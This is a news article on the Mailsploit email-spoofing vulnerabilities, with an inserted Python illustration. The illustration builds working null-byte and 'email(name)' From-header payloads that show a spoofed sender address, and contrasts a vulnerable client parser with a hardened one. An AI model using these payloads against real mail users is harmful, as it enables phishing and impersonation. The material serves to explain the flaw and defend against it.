Hackers can craft undetectable spoof emails exploiting a set of vulnerabilities found in 30 types of email clients.

A collection of vulnerabilities dubbed Mailsploit, found by German security researcher Sabri Haddouche in 30 types of email client applications – from Apple Mail to Mozilla Thunderbird – lets hackers bypass anti-spoofing mechanisms, including DMARC.

Mailsploit lets attackers “display an arbitrary sender email address to the email recipient,” wrote Haddouche, who used potus@whitehouse.gov in a demo posted to reddit. Because email headers must contain only ASCII characters, “the trick resides in using RFC-1342 (from 1992!), a recommendation that provides a way to encode non-ASCII chars inside email headers in such a way that it won't confuse the MTAs [Mail Transfer Agents] processing the email,” he said. “Unfortunately, most email clients and web interfaces don't properly sanitize the string after decoding, which leads to this email spoofing attack.”

Referring to a demo, Haddouche said that because iOS is vulnerable to null-byte injection and macOS is vulnerable to “email(name)” injection, the domain part of the original address can be hidden or removed, then replaced, by employing “a combination of control characters such as new lines or null-byte.”
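The following is an added illustration, not code from the article or from Haddouche's demo. It builds two Mailsploit-style From: header values (the null-byte and the "email(name)" variants described above, with constructed payloads and a placeholder domain attacker.example), decodes them the way an unsanitising client would, and contrasts that with a decoder that splits the raw ASCII header into display name and addr-spec before it decodes anything. The "vulnerable client" is a model of the behaviour the article describes, not the actual Apple Mail code.

```python
from __future__ import annotations

import base64
import quopri
import re

# Constructed example values; "attacker.example" stands in for whatever domain
# the sender really controls and has DKIM/SPF/DMARC configured for.
REAL_DOMAIN = "attacker.example"
SPOOFED_ADDRESS = "potus@whitehouse.gov"

# RFC 1342 / RFC 2047 encoded word: =?charset?B|Q?encoded-text?=
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([bBqQ])\?([^?]*)\?=")


def build_from_header(spoofed: str, real_domain: str, variant: str) -> str:
    """Build a Mailsploit-style From: header value (constructed payloads).

    "null":  decoded text is '<spoofed>\\x00'; a client that treats the result
             as a C string stops before the real '@domain'.
    "paren": decoded text is '<spoofed>(Name)'; a client that reads the result
             as 'email(name)' shows <spoofed> as the address.
    Either way the raw header is pure ASCII: the encoded word is simply the
    local part of a syntactically valid address at real_domain.
    """
    if variant == "null":
        payload = spoofed + "\x00"
    elif variant == "paren":
        payload = spoofed + "(Name)"
    else:
        raise ValueError(f"unknown variant {variant!r}")
    b64 = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    return f"=?utf-8?b?{b64}?=@{real_domain}"


def decode_encoded_words(text: str) -> str:
    """Decode every RFC 1342/2047 encoded word (B or Q encoding) in text."""
    def repl(m: re.Match) -> str:
        charset, enc, body = m.group(1), m.group(2).lower(), m.group(3)
        if enc == "b":
            raw = base64.b64decode(body)
        else:
            raw = quopri.decodestring(body.encode("ascii"), header=True)
        return raw.decode(charset, errors="replace")
    return ENCODED_WORD.sub(repl, text)


def mta_from_domain(raw_from: str) -> str:
    """What an MTA doing DMARC alignment sees for a bare addr-spec: it does not
    decode the encoded word, so the domain is whatever follows the last '@'."""
    return raw_from.rsplit("@", 1)[1]


def vulnerable_client_sender(raw_from: str) -> str:
    """Model of an unsanitising client: decode first, then parse the decoded
    string as an address, with both behaviours the article describes."""
    decoded = decode_encoded_words(raw_from)
    decoded = decoded.split("\x00", 1)[0]             # null-byte truncation
    m = re.match(r"^([^\s(@]+@[^\s(]+)\(", decoded)   # 'email(name)' reading
    return m.group(1) if m else decoded


def hardened_client_sender(raw_from: str) -> tuple[str, str, bool]:
    """Safer order of operations: split the raw ASCII header into display name
    and addr-spec BEFORE decoding, decode only the display name, drop control
    characters from it, and flag an encoded word inside the addr-spec (RFC 2047
    section 5 does not allow one there). Returns (name, address, suspicious)."""
    raw_from = raw_from.strip()
    if raw_from.endswith(">") and "<" in raw_from:
        name_part, addr_spec = raw_from[:-1].rsplit("<", 1)
    else:
        name_part, addr_spec = "", raw_from
    name = decode_encoded_words(name_part.strip())
    name = "".join(ch for ch in name if ch.isprintable())
    suspicious = "=?" in addr_spec
    return name, addr_spec, suspicious


if __name__ == "__main__":
    for variant in ("null", "paren"):
        hdr = build_from_header(SPOOFED_ADDRESS, REAL_DOMAIN, variant)
        print(variant, "raw header:", hdr)
        print("  MTA aligns DMARC against:", mta_from_domain(hdr))
        print("  vulnerable client shows:", vulnerable_client_sender(hdr))
        print("  hardened client shows:", hardened_client_sender(hdr))
```

The point the two decoders make is ordering: the raw header is a valid ASCII address at the attacker's domain, so server-side authentication aligns against that domain and passes; the spoof only appears once a client decodes the local part and then lets a NUL or a parenthesis cut the real domain off. Parsing the addr-spec before decoding, and refusing to decode inside it, removes the ambiguity.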

The exploits take advantage of how the email client displays the sender rather than defeating DMARC itself: the receiving server authenticates the message against the attacker's real domain, which is what the raw header actually contains. “The server still validates properly the DKIM signature of the original domain and not the spoofed one,” the researcher wrote. “While MTAs not only don't detect and block these spoofed email addresses, they will happily relay those emails as long as the original email seems trustworthy enough (the attacker can therefore ironically profit from setting up DMARC on that email address).”

As a result, Haddouche said, the spoofed emails are “virtually unstoppable.”

“Phishing attacks are one of the most effective ways for bad actors to infiltrate and infect organizations,” said Bob Noel, director of strategic relationships and marketing at Plixer. “Mailsploit is the latest example of how users can be tricked into opening emails with malicious payloads and links. End users must be trained to no longer implicitly trust emails they receive from either known or unknown senders. Given the continued high rate of phishing success, IT departments should implement Network Traffic Analytics platforms to monitor all network traffic and have access to forensic data when users fall victim to phishing attacks. This visibility enables organizations to understand what happened, return to normal, and protect themselves against the spread of malware like ransomware.”

“This is a perfect example of how phishing campaigns are becoming increasingly sophisticated and targeted,” said Eyal Benishti, CEO and founder of IRONSCALES. “As is the case here, fraudsters are frequently adopting spoofing and impersonation techniques in a quick, easy, and incredibly successful way to lure their potential victims into a false sense of security. As a result, it is becoming virtually impossible for end users to identify these phishing emails as they land in inboxes across the workforce.”

Benishti recommended that users detect and deflect phishing messages by:

1. “Checking for ‘spoofing’ through sender policy framework (SPF) records, display name, email address and domain similarity.

2. Augmenting the representation of senders inside the email client by learning true sender indicators and score sender reputation through visual cues and metadata associated with every email.

3. Integrating automatic smart real-time email scanning into multi anti-virus, and sandbox solutions so forensics can be performed on any suspicious emails either detected, or reported.

4. Allowing quick reporting via an augmented email experience, thus helping the user make better decisions.”